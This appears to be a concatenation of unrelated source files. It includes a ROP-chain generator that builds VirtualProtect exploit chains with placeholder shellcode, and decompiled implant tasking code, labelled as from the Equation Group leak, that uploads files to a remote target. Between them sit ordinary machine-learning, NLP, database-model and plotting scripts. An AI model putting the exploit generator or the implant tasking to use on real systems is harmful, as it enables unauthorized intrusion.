if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return gadgets[0]
else:
return ''
def __extract(self, param):
if (not match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param)) and (not match('0x[0-9a-fA-F]+', param)):
            raise RopChainError('Parameter has to have the following format: <hexnumber>,<hexnumber> or <hexnumber>')
        split = param.split(',')
        if len(split) == 2:
            return (int(split[0], 16), int(split[1], 16))
        return (None, int(split[0], 16))
def __getVirtualProtectEntry(self):
for binary in self._binaries:
if binary.type == Type.PE:
s = binary.sections['.idata']
for descriptorData in s.importDescriptorTable:
for function in descriptorData.functions:
if str(function[1]) == 'VirtualProtect':
return function[2]
else:
self._printer.printError('File is not a PE file.')
return None
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address,size or size')
self._printer.printInfo('Ropchain Generator for VirtualProtect:\n')
self._printer.println('eax 0x90909090\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to VirtualProtect\nedi ret (rop nop)\n')
address, size = self.__extract(param)
given = False
if not address:
address = self.__getVirtualProtectEntry()
if not address:
self._printer.printError('No IAT-Entry for VirtualProtect found!')
raise RopChainError('No IAT-Entry for VirtualProtect found and no address is given')
else:
given = True
writeable_ptr = self._binaries[0].getWriteableSection().offset + 0x4
jmp_esp = self._createJmp()
ret_addr = self._searchOpcode('c3')
chain = self._printHeader()
chain += '\n\nshellcode = \'\\xcc\'*100\n\n'
gadgets = []
to_extend = []
chain_tmp = ''
try:
self._printer.printInfo('Try to create gadget to fill esi with content of IAT address: %s' % address)
chain_tmp += self._createLoadRegValueFrom('esi', address)[0]
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
to_extend = ['esi','si']
except:
self._printer.printInfo('Cannot create fill esi gadget!')
self._printer.printInfo('Try to create this chain:\n')
self._printer.println('eax Pointer to VirtualProtect\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to jmp [eax]\nedi ret (rop nop)\n')
jmp_eax = self._searchOpcode('ff20') # jmp [eax]
gadgets.append((self._createAddress, [jmp_eax.lines[0][0]],{'reg':'esi'},['esi','si']))
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
gadgets.append((self._createNumber, [size],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']+to_extend))
gadgets.append((self._createAddress, [writeable_ptr],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']+to_extend))
gadgets.append((self._createAddress, [jmp_esp.lines[0][0]],{'reg':'ebp'},['ebp', 'bp']+to_extend))
gadgets.append((self._createNumber, [0x40],{'reg':'edx'},['edx', 'dx', 'dh', 'dl']+to_extend))
gadgets.append((self._createAddress, [ret_addr.lines[0][0]],{'reg':'edi'},['edi', 'di']+to_extend))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp += self._createDependenceChain(gadgets)
self._printer.printInfo('Look for pushad gadget')
chain_tmp += self._createPushad()
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
| gpl-2.0 | -8,572,569,844,129,845,000 | 39.707537 | 218 | 0.562022 | false |
myfavouritekk/TPN | tools/propagate/regression_propagation.py | 1 | 6216 | #!/usr/bin/env python
# --------------------------------------------------------
# Test regression propagation on ImageNet VID video
# Modified by Kai KANG ([email protected])
# --------------------------------------------------------
"""Test a Fast R-CNN network on an image database."""
import argparse
import pprint
import time
import os
import os.path as osp
import sys
import cPickle
import numpy as np
this_dir = osp.dirname(__file__)
# add caffe-mpi path
sys.path.insert(0, osp.join(this_dir, '../../external/caffe-mpi/build/install/python'))
import caffe
# add py-faster-rcnn paths
sys.path.insert(0, osp.join(this_dir, '../../external/py-faster-rcnn/lib'))
from fast_rcnn.craft import im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
# add external libs
sys.path.insert(0, osp.join(this_dir, '../../external'))
from vdetlib.utils.protocol import proto_load, proto_dump
# add src libs
sys.path.insert(0, osp.join(this_dir, '../../src'))
from tpn.propagate import roi_propagation
from tpn.target import add_track_targets
from tpn.data_io import save_track_proto_to_zip
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Test a Fast R-CNN network')
parser.add_argument('vid_file')
parser.add_argument('box_file')
parser.add_argument('save_file', help='Save zip file')
parser.add_argument('--annot_file', default=None,
help='Ground truth annotation file. [None]')
parser.add_argument('--job', dest='job_id', help='Job slot, GPU ID + 1. [1]',
default=1, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--param', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--num_per_batch', dest='boxes_num_per_batch',
help='split boxes to batches. [32]',
default=32, type=int)
parser.add_argument('--bbox_mean', dest='bbox_mean',
help='the mean of bbox',
default=None, type=str)
parser.add_argument('--bbox_std', dest='bbox_std',
help='the std of bbox',
default=None, type=str)
parser.add_argument('--bbox_pred_layer', dest='bbox_pred_layer',
help='Layer name for bbox regression layer in feature net.',
default='bbox_pred_vid', type=str)
parser.add_argument('--scheme', help='Propagation scheme. [weighted]',
choices=['max', 'mean', 'weighted'], default='weighted')
parser.add_argument('--length', type=int, default=9,
help='Propagation length. [9]')
parser.add_argument('--sample_rate', type=int, default=1,
help='Temporal subsampling rate. [1]')
parser.add_argument('--offset', type=int, default=0,
help='Offset of sampling. [0]')
parser.add_argument('--wait', dest='wait',
help='wait until net file exists',
default=True, type=bool)
parser.add_argument('--gpus', nargs='+', default=None, type=int, help='Available GPUs.')
parser.add_argument('--zip', action='store_true',
help='Save as zip files rather than track protocols')
parser.add_argument('--keep_feat', action='store_true',
help='Keep feature.')
parser.set_defaults(vis=False, zip=False, keep_feat=False)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print 'Called with args:'
print args
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.job_id - 1
print 'Using config:'
pprint.pprint(cfg)
while not os.path.exists(args.caffemodel) and args.wait:
print 'Waiting for {} to exist...'.format(args.caffemodel)
time.sleep(10)
caffe.set_mode_gpu()
if args.gpus is None:
caffe.set_device(args.job_id - 1)
else:
assert args.job_id <= len(args.gpus)
caffe.set_device(args.gpus[args.job_id-1])
net = caffe.Net(args.prototxt, args.caffemodel, caffe.TEST)
net.name = os.path.splitext(os.path.basename(args.caffemodel))[0]
# apply bbox regression normalization on the net weights
with open(args.bbox_mean, 'rb') as f:
bbox_means = cPickle.load(f)
with open(args.bbox_std, 'rb') as f:
bbox_stds = cPickle.load(f)
net.params[args.bbox_pred_layer][0].data[...] = \
net.params[args.bbox_pred_layer][0].data * bbox_stds[:, np.newaxis]
net.params[args.bbox_pred_layer][1].data[...] = \
net.params[args.bbox_pred_layer][1].data * bbox_stds + bbox_means
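# Training normalizes the bbox regression targets by these means/stds, so
# fold them back into the prediction layer (W *= std per target,
# b = b*std + mean) to make the raw network output directly usable at
# test time.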
vid_proto = proto_load(args.vid_file)
box_proto = proto_load(args.box_file)
track_proto = roi_propagation(vid_proto, box_proto, net, im_detect, scheme=args.scheme,
length=args.length, sample_rate=args.sample_rate,
keep_feat=args.keep_feat, batch_size=args.boxes_num_per_batch)
# add ground truth targets if annotation file is given
if args.annot_file is not None:
annot_proto = proto_load(args.annot_file)
add_track_targets(track_proto, annot_proto)
if args.zip:
save_track_proto_to_zip(track_proto, args.save_file)
else:
proto_dump(track_proto, args.save_file)
| mit | 8,607,709,763,917,852,000 | 38.341772 | 92 | 0.591055 | false |
qe-team/marmot | marmot/experiment/context_utils.py | 1 | 15242 | from __future__ import print_function, division
import sys
import numpy as np
from collections import Counter
###########################################################################
#
# This file contains different functions for generation of non-standard
# contexts (contexts where each 'token' is a list of words)
#
###########################################################################
# return the window of a list
# add symbols '_START_' and '_END_' if the range exceeds the length of the list
def negative_window(my_list, start, end):
res = []
while start < 0:
res.append('_START_')
start += 1
while start < min(end, len(my_list)):
res.append(my_list[start])
start += 1
while end > len(my_list):
res.append('_END_')
end -= 1
return res
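# Illustrative examples (three-token sentence):
#   negative_window(['a', 'b', 'c'], -2, 2) -> ['_START_', '_START_', 'a', 'b']
#   negative_window(['a', 'b', 'c'], 1, 4)  -> ['b', 'c', '_END_']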
def create_context_ngram(repr_dict, order, test=False, unambiguous=False, bad_tagging="pessimistic"):
'''
:param repr_dict: a dict representing a 'line' or 'sentence' or a 'segment'
:return: a list of context objects representing the data for each token in the sequence
'''
context_list = []
# is checked before in create_contexts, but who knows
if 'target' not in repr_dict:
print("No 'target' label in data representations")
return []
if 'tags' not in repr_dict:
print("No 'tag' label in data representations or wrong format of tag")
print(repr_dict)
return []
active_keys = repr_dict.keys()
active_keys.remove('tags')
tag_map = {'OK': 1, 'BAD': 0}
# if the order is greater than 1, we need to have the equal number of ngrams for each word
# so we need to go beyond the borders of a sentence:
# "this is my younger brother" has 3 3-grams: "this is my", "is my younger" and "my younger brother"
# "my" participates in 3 trigrams, other words in 2 or less.
# but we need all words to participate in 3 3-grams, so we create the following trigrams:
# "_START_ _START_ this", "_START_ this is", "this is my", "is my younger" and "my younger brother", "younger brother _END_", "brother _END_ _END_"
#logger.info("Order: {}".format(order))
for i in range(len(repr_dict['target']) + order - 1):
#logger.info("Word {}".format(i))
c = {}
#logger.info("Negative window from {} to {}, length {}".format(i - order + 1, i + 1, len(repr_dict['target'])))
c['token'] = negative_window(repr_dict['target'], i - order + 1, i + 1)
c['index'] = (i - order + 1, i + 1)
# we take only tags for the existing tags
# i.e. for the sequence "_START_ _START_ it" the tag will be the tag for "it" only
tags = [tag_map[t] for t in repr_dict['tags'][max(0, i-order+1):min(len(repr_dict['tags']), i+1)]]
c['tag'] = np.average(tags)
for k in active_keys:
c[k] = repr_dict[k]
context_list.append(c)
return context_list
# create a new segmentation that divides only "GOOD" segments
# and keeps "BAD" segments unchanged
# TODO: add new ways of segmenting? (e.g. keep BAD segments untouched)
def error_based_segmentation(repr_dict):
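    # Worked example (hypothetical input): tags = [OK, OK, BAD, OK] with
    # Moses segments [(0, 2), (2, 4)] yields [(0, 2), (2, 3), (3, 4)],
    # splitting the mixed segment at the OK/BAD boundary.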
# borders between segments with different labels
score_borders = [(i, i+1) for i in range(len(repr_dict['tags'])-1) if repr_dict['tags'][i] != repr_dict['tags'][i+1]]
# borders of phrases provided by Moses
segmentation_borders = [(j-1, j) for (i, j) in repr_dict['segmentation']][:-1]
# join both border types so that all phrases have unambiguous scores
# and there are no too long segments
new_borders = sorted(set(score_borders + segmentation_borders))
new_segments = []
prev = 0
# convert new borders to segments
for border in new_borders:
new_segments.append((prev, border[1]))
prev = border[1]
new_segments.append((new_borders[-1][1], len(repr_dict['target'])))
return new_segments
# we don't really need the order here, it should always be None
# or anything else
# :test: -- True if data is test data, False if training -- test sentences can have empty source-segmentation field (if Moses failed to produce constrained reference for them)
# :only_target: -- True if only target sentence is segmented, needs to be processed without source segmentation
# :bad_tagging: -- tag all phrases with at least one bad word as "BAD"
# if seg to False - only phrases with 50% or more bad words are tagged as "BAD"
# :tags_format: -- 'word': one tag per word (conversion to phrase-level tags needed),
# 'phrase': one tag per phrase (no conversion needed)
def create_context_phrase(repr_dict, order=None, unambiguous=False, test=False, bad_tagging="pessimistic", tags_format='word'):
'''
:param repr_dict: a dict representing a 'line' or 'sentence' or a 'segment'
:return: a list of context objects representing the data for each token in the sequence
'''
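    # Each returned context is a dict shaped roughly like:
    #   {'token': [...], 'index': (i, j), 'source_token': [...],
    #    'source_index': (k, l), 'tag': 'OK'|'BAD', <other repr_dict keys>}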
#print("CONTEXT CREATOR for a sentence")
#print(repr_dict)
# how many words had to change their tag from good to bad and vise versa
good2bad, bad2good = 0, 0
context_list = []
# is checked before in create_contexts, but who knows
if 'target' not in repr_dict:
print("No 'target' label in data representations")
return []
if 'tags' not in repr_dict:
print("No 'tag' label in data representations or wrong format of tag")
print(repr_dict)
return []
if 'segmentation' not in repr_dict or len(repr_dict['segmentation']) == 0:
# for the test data assuming that sentences without segmentation consist of one-word segments
if test:
repr_dict['segmentation'] = [(i, i+1) for i in range(len(repr_dict['target']))]
# for the training data omitting sentences without segmentation
else:
# print("No 'segmentation' label in data representations")
return []
if unambiguous:
assert('source_segmentation' not in repr_dict or len(repr_dict['source_segmentation']) == 0), "Error-based segmentation of target can't be performed if source segmentation exists -- after re-segmentation source and target segments won't match"
assert(not test), "Error-based segmentation can't be applied to the test set"
#print("Unambiguous")
print("Old segmentation: ", repr_dict['segmentation'])
repr_dict['segmentation'] = error_based_segmentation(repr_dict)
print("New segmentation: ", repr_dict['segmentation'])
# no source segmentation means that no Moses segmentation was produced
# in the training data we leave these sentences out
# in the test data they are processed as normal
# assuming that every target word is a separate segment
active_keys = repr_dict.keys()
active_keys.remove('tags')
if 'source_segmentation' in repr_dict:
active_keys.remove('source_segmentation')
if len(repr_dict['source_segmentation']) != 0 and len(repr_dict['source_segmentation']) != len(repr_dict['segmentation']):
print("Wrong segmentation lengths: ", repr_dict)
sys.exit()
for idx, (i, j) in enumerate(repr_dict['segmentation']):
c = {}
c['token'] = repr_dict['target'][i:j]
c['index'] = (i, j)
# source phrase from the phrase segmentation
if 'source_segmentation' in repr_dict and len(repr_dict['source_segmentation']) != 0:
src_seg = repr_dict['source_segmentation'][idx]
c['source_token'] = repr_dict['source'][src_seg[0]:src_seg[1]]
c['source_index'] = (src_seg[0], src_seg[1])
# source phrase from the alignments
elif 'alignments' in repr_dict:
alignments = []
for ii in range(c['index'][0], c['index'][1]):
try:
cur_align = repr_dict['alignments'][ii]
if cur_align is not None:
alignments.append(repr_dict['alignments'][ii])
except IndexError:
print("Indices: {} to {}, current: {}".format(c['index'][0], c['index'][1], ii))
print("Alignments: ", repr_dict['alignments'])
print("Representation: ", repr_dict)
sys.exit()
            # sort the de-duplicated alignment points so the first/last
            # entries really are the leftmost/rightmost aligned source words
            # (a bare set has no defined order and cannot be indexed)
            alignments = sorted(set(alignments))
if len(alignments) == 0:
c['source_token'] = []
c['source_index'] = ()
# source phrase -- substring between the 1st and the last word aligned to the target phrase
# (unaligned words in between are included)
else:
c['source_token'] = [repr_dict['source'][ii] for ii in alignments]
c['source_index'] = (alignments[0], alignments[-1] + 1)
else:
c['source_token'] = []
c['source_index'] = ()
if len(c['token']) == 0:
print("No token: from {} to {} in target: ".format(i, j), repr_dict['target'], repr_dict['source'], repr_dict['segmentation'])
if j == 0:
print("j==0!")
print("Target: '{}', segmentation: {}, {}".format(' '.join(repr_dict['target']), i, j))
if i == j or (len(repr_dict['tags'][i:j]) == 0 and tags_format == 'word') or len(repr_dict['target'][i:j]) == 0:
print("i==j!")
print("Target: '{}', tags: '{}' segmentation: {}, {}".format(' '.join([w.encode('utf-8') for w in repr_dict['target']]), ' '.join(repr_dict['tags']), i, j))
tags_cnt = Counter(repr_dict['tags'][i:j])
# super-pessimistic tagging -- if BAD occurs any number of times - the final tag is BAD
bad_all = tags_cnt['BAD']
good_all = tags_cnt['OK']
if tags_format == 'word':
if bad_tagging == "super_pessimistic":
if tags_cnt['BAD'] > 0:
c['tag'] = 'BAD'
good2bad += good_all
else:
c['tag'] = 'OK'
# pessimistic tagging -- if BAD occurs in 1 of 3 words or more often -- the final tag is BAD
elif bad_tagging == "pessimistic":
if tags_cnt['BAD']/len(repr_dict['tags'][i:j]) < 0.3:
c['tag'] = 'OK'
bad2good += bad_all
else:
c['tag'] = 'BAD'
good2bad += good_all
# optimisic - if OK occurs as much or more than BAD - the final tag is OK
elif bad_tagging == "optimistic":
if tags_cnt['OK'] >= tags_cnt['BAD']:
bad2good += bad_all
c['tag'] = 'OK'
else:
c['tag'] = 'BAD'
good2bad += good_all
else:
print("Unknown tag assignment scheme: {}".format(bad_tagging))
sys.exit()
elif tags_format == 'phrase':
c['tag'] = repr_dict['tags'][idx]
else:
print("Unknown tags format: {}".format(tags_format))
sys.exit()
for k in active_keys:
c[k] = repr_dict[k]
context_list.append(c)
return context_list, good2bad, bad2good
# create contexts where 'token' is an ngram of arbitrary length
# data_type is always 'plain' (no 'sequential' or 'token' for now)
# :order: -- order of ngram
# :data_type: -- 'plain' - data is a flat list
# 'sequential' - data is a list of sequences (used for dev and test)
def create_contexts_ngram(data_obj, order=None, data_type='plain', test=False, unambiguous=False, bad_tagging="pessimistic", tags_format='word'):
'''
:param data_obj: an object representing a dataset consisting of files
:param data_type:
:return:
'''
print("ENTER CONTEXTS CREATOR")
contexts = []
if 'target' not in data_obj:
print("No 'target' label in data representations")
return []
if 'tags' not in data_obj:
print("No 'tag' label in data representations or wrong format of tag")
return []
if 'segmentation' in data_obj:
context_generator = create_context_phrase
else:
if order is None:
print("The order of ngrams has to be defined to create the ngram contexts")
return []
context_generator = create_context_ngram
print("Sentences in the data: {}".format(len(data_obj['target'])))
if 'target_file' in data_obj:
data_obj.pop('target_file')
if 'source_file' in data_obj:
data_obj.pop('source_file')
overall = 0
good2bad, bad2good = 0, 0
if data_type == 'plain':
print("DATATYPE: PLAIN")
print(len(data_obj.values()))
for r_key in data_obj:
print("{} -- {} values".format(r_key, len(data_obj[r_key])))
# print(zip(*data_obj.values())[0])
for s_idx, sents in enumerate(zip(*data_obj.values())):
#print("SENTENCE {}".format(s_idx))
# all_out = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging)
# print("ALL: ", all_out)
#(cont, good, bad) = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging)
all_out = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging, tags_format=tags_format)
if len(all_out) < 3:
continue
good2bad += all_out[1]
bad2good += all_out[2]
overall += len(all_out[0])
# print("Type of the generated context: ", type(cont))
contexts.extend(all_out[0])
# print("Contexts: {}".format(overall))
elif data_type == 'sequential':
print("SEQUENTIAL")
for s_idx, sents in enumerate(zip(*data_obj.values())):
all_out = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging, tags_format=tags_format)
if len(all_out) < 3:
continue
#print("SEQ CONTEXTS: {}".format(len(cont)))
good2bad += all_out[1]
bad2good += all_out[2]
overall += len(all_out[0])
contexts.append(all_out[0])
else:
print("UNKNOWN DATATYPE: {}".format(data_type))
print("Good to bad: {}\nBad to good: {}, \nTotal: {}".format(good2bad, bad2good, overall))
return contexts
# output a flat list of numbers
# a number for each context -- means the number of words this context represents
def get_contexts_words_number(contexts):
numbers_list = []
for c in contexts:
try:
numbers_list.append(len(c['token']))
except TypeError:
print("Erroneous context: ", c)
print("List: ", contexts)
print("The 'token' field has to be of type 'list', is actually {}".format(type(c['token'])))
sys.exit()
return numbers_list
| isc | -6,508,214,843,344,275,000 | 46.335404 | 251 | 0.584635 | false |
TunnelBlanket/Houdini | Houdini/Data/Stamp.py | 1 | 1225 | # coding: utf-8
from sqlalchemy import Column, Integer, SmallInteger, text, ForeignKey
from sqlalchemy.orm import relationship
from Houdini.Data import Base
metadata = Base.metadata
class Stamp(Base):
__tablename__ = 'stamp'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False)
Recent = Column(Integer, nullable=False, server_default=text("1"))
penguin = relationship(u'Penguin')
class CoverStamp(Base):
__tablename__ = 'cover_stamps'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False, server_default=text("0"))
X = Column(SmallInteger, nullable=False, server_default=text("0"))
Y = Column(SmallInteger, nullable=False, server_default=text("0"))
Type = Column(SmallInteger, nullable=False, server_default=text("0"))
Rotation = Column(SmallInteger, nullable=False, server_default=text("0"))
Depth = Column(SmallInteger, nullable=False, server_default=text("0"))
penguin = relationship(u'Penguin') | mit | -1,121,676,306,723,954,800 | 41.275862 | 125 | 0.726531 | false |
Crompulence/cpl-library | examples/interactive_plot_example/python/CFD_recv_and_plot_grid_interactive.py | 1 | 3724 | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
from mpi4py import MPI
from cplpy import CPL
from draw_grid import draw_grid
#initialise MPI and CPL
comm = MPI.COMM_WORLD
CPL = CPL()
CFD_COMM = CPL.init(CPL.CFD_REALM)
nprocs_realm = CFD_COMM.Get_size()
# Parameters of the cpu topology (cartesian grid)
npxyz = np.array([1, 1, 1], order='F', dtype=np.int32)
NProcs = np.product(npxyz)
xyzL = np.array([10.0, 10.0, 10.0], order='F', dtype=np.float64)
xyz_orig = np.array([0.0, 0.0, 0.0], order='F', dtype=np.float64)
ncxyz = np.array([16, 6, 16], order='F', dtype=np.int32)
if (nprocs_realm != NProcs):
print("Non-coherent number of processes in CFD ", nprocs_realm,
" no equal to ", npxyz[0], " X ", npxyz[1], " X ", npxyz[2])
MPI.Abort(errorcode=1)
#Setup coupled simulation
cart_comm = CFD_COMM.Create_cart([npxyz[0], npxyz[1], npxyz[2]])
CPL.setup_cfd(cart_comm, xyzL, xyz_orig, ncxyz)
#Plot output
fig, ax = plt.subplots(1,1)
plt.subplots_adjust(bottom=0.25)
axslider = plt.axes([0.25, 0.1, 0.65, 0.03])
freq = 1.
sfreq = Slider(axslider, 'Freq', 0.1, 2.0, valinit=freq)
def update(val):
    global freq
    freq = sfreq.val
    print("CHANGED", freq)
sfreq.on_changed(update)
plt.ion()
plt.show()
# === Plot both grids ===
dx = CPL.get("xl_cfd")/float(CPL.get("ncx"))
dy = CPL.get("yl_cfd")/float(CPL.get("ncy"))
dz = CPL.get("zl_cfd")/float(CPL.get("ncz"))
ioverlap = (CPL.get("icmax_olap")-CPL.get("icmin_olap")+1)
joverlap = (CPL.get("jcmax_olap")-CPL.get("jcmin_olap")+1)
koverlap = (CPL.get("kcmax_olap")-CPL.get("kcmin_olap")+1)
xoverlap = ioverlap*dx
yoverlap = joverlap*dy
zoverlap = koverlap*dz
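# Physical extent of the overlap region: number of overlapped cells in
# each direction times the uniform cell sizes computed above.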
for time in range(100000):
# recv data to plot
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
recv_array = np.zeros((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
recv_array, ierr = CPL.recv(recv_array, olap_limits)
#Plot CFD and coupler Grid
draw_grid(ax,
nx=CPL.get("ncx"),
ny=CPL.get("ncy"),
nz=CPL.get("ncz"),
px=CPL.get("npx_cfd"),
py=CPL.get("npy_cfd"),
pz=CPL.get("npz_cfd"),
xmin=CPL.get("x_orig_cfd"),
ymin=CPL.get("y_orig_cfd"),
zmin=CPL.get("z_orig_cfd"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=CPL.get("yl_cfd"),
zmax=(CPL.get("kcmax_olap")+1)*dz,
lc = 'r',
label='CFD')
#Plot MD domain
draw_grid(ax, nx=1, ny=1, nz=1,
px=CPL.get("npx_md"),
py=CPL.get("npy_md"),
pz=CPL.get("npz_md"),
xmin=CPL.get("x_orig_md"),
ymin=-CPL.get("yl_md")+yoverlap,
zmin=CPL.get("z_orig_md"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=yoverlap,
zmax=(CPL.get("kcmax_olap")+1)*dz,
label='MD')
#Plot x component on grid
x = np.linspace(CPL.get("x_orig_cfd")+.5*dx,xoverlap-.5*dx,ioverlap)
z = np.linspace(CPL.get("z_orig_cfd")+.5*dz,zoverlap-.5*dz,koverlap)
for j in range(joverlap):
ax.plot(x, 0.5*dy*(recv_array[0,:,j,0]+1.+2*j), 's-')
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
print(time, freq)
plt.pause(0.1)
ax.cla()
# send data to update
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
send_array = freq*np.ones((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
CPL.send(send_array, olap_limits)
CPL.finalize()
MPI.Finalize()
| gpl-3.0 | 4,246,740,477,422,610,000 | 30.033333 | 81 | 0.583512 | false |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Tasking/Mcl_Cmd_Put_Tasking.py | 1 | 6883 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_Put_Tasking.py
UPLOADS_DIR = 'Uploads'
MAX_CHUNK_SIZE = 1047552
def TaskingMain(namespace):
import mcl.imports
import mcl.target
import mcl.tasking
import mcl.tasking.env
import mcl.tasking.resource
import mcl.tasking.technique
import mcl.tasking.virtualdir
from mcl.object.Message import MarshalMessage
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put', globals())
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put.tasking', globals())
lpParams = mcl.tasking.GetParameters()
if lpParams['chunksize'] == 0 or lpParams['chunksize'] >= MAX_CHUNK_SIZE:
mcl.tasking.OutputError('Invalid chunkSize given')
return False
else:
provider = mcl.tasking.technique.Lookup('PUT', mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, lpParams['method'])
if lpParams['source'] == None or len(lpParams['source']) == 0:
mcl.tasking.OutputError('No local file given')
return False
local = lpParams['source']
if lpParams['remote'] == None or len(lpParams['remote']) == 0:
if local.find('\\') != -1 or local.find('/') != -1:
mcl.tasking.OutputError('You must specify a remote file name if you specify a path for the local file')
return False
remote = local
else:
remote = lpParams['remote']
resFlags = 0
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_ARCH
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_OS
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_LIBC
if lpParams['compiled']:
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_COMPILED
f, openedName, usedProject = mcl.tasking.resource.Open(local, resFlags, UPLOADS_DIR, lpParams['project'])
if f == None:
mcl.tasking.OutputError("Failed to open local file '%s'" % local)
return False
try:
import os.path
import array
fileSize = os.path.getsize(openedName)
if fileSize == 0 or fileSize > 4294967295:
mcl.tasking.OutputError("Invalid file size (%u) for put of '%s'" % (fileSize, openedName))
return False
taskXml = mcl.tasking.Tasking()
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, provider)
mcl.tasking.OutputXml(taskXml.GetXmlObject())
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PutFile')
xml.AddAttribute('name', openedName)
xml.AddAttribute('size', '%u' % fileSize)
mcl.tasking.OutputXml(xml)
fileBytes = array.array('B', f.read())
if len(fileBytes) != fileSize:
mcl.tasking.OutputError('Failed to read file (read=%u | expected=%u)' % (len(fileBytes), fileSize))
return False
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_SIZE, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_OPENED, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED, 'false')
finally:
f.close()
f = None
createParams = mca.file.cmd.put.CreateParams()
createParams.writeOffset = 0
createParams.provider = provider
if lpParams['permanent']:
createParams.flags |= mca.file.cmd.put.PARAMS_CREATE_FLAG_PERMANENT
try:
createParams.filePath = mcl.tasking.virtualdir.GetFullPath(remote)
except:
mcl.tasking.OutputError('Failed to apply virtual directory to remote name')
return False
rpc = mca.file.cmd.put.tasking.RPC_INFO_CREATE
msg = MarshalMessage()
createParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
import time
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_FILE_OPENED):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
chunkIndex = 0
bytesLeft = fileSize
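        # Stream the file in chunks of at most lpParams['chunksize'] bytes;
        # after each WRITE RPC, poll LP_ENV_BYTES_LEFT until the target
        # acknowledges the data before sending the next chunk.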
while bytesLeft > 0:
